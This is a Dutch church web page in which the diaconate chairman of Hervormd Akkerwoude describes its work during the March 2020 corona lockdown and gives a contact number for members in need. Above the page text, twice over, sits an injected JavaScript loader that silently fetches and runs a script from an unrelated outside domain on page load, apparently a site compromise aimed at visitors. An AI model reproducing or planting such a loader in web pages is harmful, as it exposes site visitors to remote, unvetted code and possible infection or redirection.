;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Het functioneren van de diaconie van Hervormd Akkerwoude c.a. gedurende de corona-crisis - PKN Damwâld

Het functioneren van de diaconie van Hervormd Akkerwoude c.a. gedurende de corona-crisis

Gepubliceerd op: donderdag 19 maart 2020

Tot en met 6 april staat alles een beetje stil, daar zoals bekend geen kerkdiensten gehouden kunnen worden. Hoe het na 6 april komt, is voor ons allemaal onduidelijk. De Avondmaalsviering op Witte Donderdag en Goede Vrijdag (Nij Tjaerda) en de diensten met Pasen – het is afwachten wat er mogelijk is. Laten we samen in vertrouwen op onze Heer zien wat er komt.
Zijn er mensen in onze gemeente die in de problemen komen en die hulp nodig hebben in deze periode, dan kunt u terecht bij de voorzitter van de Diaconie: Hotze van Dijk,  06-2206 9262.

Wij wensen iedereen binnen en buiten onze gemeente veel geduld en wijsheid in deze spannende weken. Weet dat er altijd iemand –onze Heer– over onze schouder meekijkt.

Hotze van Dijk
Voorzitter diaconie